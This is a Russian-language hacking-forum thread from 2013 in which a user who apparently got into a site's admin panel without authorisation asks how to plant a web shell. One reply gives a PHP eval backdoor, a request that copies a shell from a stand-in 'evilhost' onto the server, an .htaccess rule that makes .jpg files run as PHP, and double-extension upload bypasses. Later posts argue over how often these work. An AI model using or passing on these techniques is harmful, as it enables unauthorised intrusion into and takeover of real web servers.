ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   Заливка шелла через правку html (https://forum.antichat.io/showthread.php?t=402740)

Rasta18 28.12.2013 17:29

Вчера попал в админку.

А в ней можно только новости в html редактировать, ток вот я попробывал вставить:

Загрузка файлов

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]





[/COLOR][COLOR="#0000BB"]Отправка файла на сервер[/COLOR][COLOR="#007700"]















[/COLOR][/COLOR

форма отображается на странице

но файлы я так понял всё равно не загружаются... думаю прав нет.

Есть ещё варианты для загрузки шелла через html ?

wkar 28.12.2013 18:21

Цитата:

Сообщение от Rasta18
Вчера попал в админку.
А в ней можно только новости в html редактировать, ток вот я попробывал вставить:
Загрузка файлов
PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]





[/COLOR][COLOR="#0000BB"]Отправка файла на сервер[/COLOR][COLOR="#007700"]















[/COLOR][/COLOR

форма отображается на странице
но файлы я так понял всё равно не загружаются... думаю прав нет.
Есть ещё варианты для загрузки шелла через html ?

вариантов вообше нет

Konqi 28.12.2013 18:28

жжЁте

по вашему файл сам себя будет копировать на жесткий диск? вы же не обрабатываете файл на стороне сервера

Inoms 28.12.2013 19:20

Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.

Rasta18 29.12.2013 03:34

Цитата:

Сообщение от Inoms
Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.

Видимо именно так.

Неужели действительно нет вариантов??

Konqi 29.12.2013 18:00

Цитата:

Сообщение от Rasta18
Видимо именно так.
Неужели действительно нет вариантов??

нет.

next 29.12.2013 18:03

Варианты может и есть просто не через правку новостей

Может в админе есть заливка картинок или других файлов ?

Rasta18 29.12.2013 21:33

Цитата:

Сообщение от next
Варианты может и есть просто не через правку новостей
Может в админе есть заливка картинок или других файлов ?

заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg

это можно обойти?

Inoms 29.12.2013 21:47

Цитата:

Сообщение от Rasta18
заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg
это можно обойти?

Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.

Rasta18 29.12.2013 22:25

Цитата:

Сообщение от Inoms
Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.

думаю нет.

так как все странички сайта на html, но у меня когда-то доступ к нему был и знаю что оболочка вся на php, ничего кроме xss там не нашлось

Take_IT 30.12.2013 00:24

Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)

Что за движок?

можно попробовать вставить php код с бекдором:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]php

[/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]@[/COLOR][/COLOR

Смотрим абсолютный путь:

Код HTML:

localhost/?e=phpinfo();
Льем шелл:

Код HTML:

yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");
Это в свое время сработало на PHPShop CMS, кстати не так давно....

Это как вариант номер раз)

Вариант номер 2.1:

Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....

Вариант 2.2:

Также можно попробовать залить shell.jpg

Предварительно залив .htaccess следующего содержания:

Код HTML:

AddType application/x-httpd-php .jpg
Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)

Вариант 2.3:

Попробуй залить файл shell.php.g1f или shell.php.ololo

файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.

PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...

Konqi 30.12.2013 15:09

умники собрались

Тake_IT

"@php

eval($_REQUEST[e]);

php@ "

ты где встречал такие теги "@php php@" ?

если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."

ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php

такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.

Take_IT 30.12.2013 22:58

Цитата:

Сообщение от Konqi
умники собрались

[offtop]Раньше ты попроще был)) [/offtop]

Цитата:

Сообщение от Konqi
"@php
eval($_REQUEST[e]);
php@ "
ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....

Цитата:

Сообщение от Konqi
тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)

Цитата:

Сообщение от Konqi
"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php
такие методы могут сработать в конкретных двигах
, но в общем случай писать о них как о методах заливки шелла это глупо.

случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%

в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??

PS мне кажется от твоего совета было бы больше проку, чем от критики)

Konqi 31.12.2013 05:06

Цитата:

Сообщение от Take_IT
[offtop]Раньше ты попроще был)) [/offtop]
а ты наверное с другого акка сидел.
PS мне кажется от твоего совета было бы больше проку, чем от критики)

я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой

Take_IT 31.12.2013 11:54

Цитата:

Сообщение от Konqi
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой

ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...

PS ага, пароль потерял, давно не заходил сюда)

BigBear 31.12.2013 14:49

Цитата:

Сообщение от Take_IT
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...
PS ага, пароль потерял, давно не заходил сюда)

Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?

Take_IT 31.12.2013 17:36

опачки! одепты подтянулись)))

Ох, ну ничего себе кто меня учить собрался))))

Цитата:

Сообщение от BigBear
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

да я и не утверждаю что нормальный человек так настроит сервер суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...

А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему

Цитата:

Сообщение от BigBear
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)

file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залилиfile.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых

Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)

Цитата:

Сообщение от BigBear
З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?

троллинг не засчитан, тренируйтесь лучше на кошках (с)

Konqi 31.12.2013 17:44

Цитата:

Сообщение от Take_IT
file.php.ololo
имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать
file.php.ololo
точно также как и
file.php

http://screenshotuploader.com/i/1312/79zyz.png

Take_IT 31.12.2013 17:55

Цитата:

Сообщение от Konqi

пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)

Unknown 31.12.2013 18:00

Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.

mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.

Konqi 31.12.2013 18:03

Цитата:

Сообщение от Take_IT
пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)

я никакой защиты не ставил,

Цитата:

Сообщение от None
но ведь на локалке, в искусственных условиях

у меня дефолтные настройки апача, никаких искуственных условий

просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный

Take_IT 31.12.2013 18:10

Цитата:

Сообщение от Konqi
я никакой защиты не ставил,
у меня дефолтные настройки апача, никаких искуственных условий
просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный

да я как бы с вами и не спорю просто дискуссия началась с того, что меня "назвали дураком" грубо говоря...))) мол, "к чему ты это написал вообще" . вот я и пытаюсь объяснить свою позицию в отношении того, почему я порекомендовал данный вариант - лишь потому, что в определенном ряде случаев это помогает добиться фактического результата) и нет никакой уверенности в том, что админ целевого сервера не курит))

тс просил не разжевать ему теорию, а дать практический совет который помог бы ему залиться в данном случае! С учетом того, что в его ситуации практически не из чего выбирать я посоветовал ему эти способы)

дико извиняюсь, если кого то это затронуло за живое

ЗЫ всех с Наступающим))


Время: 10:15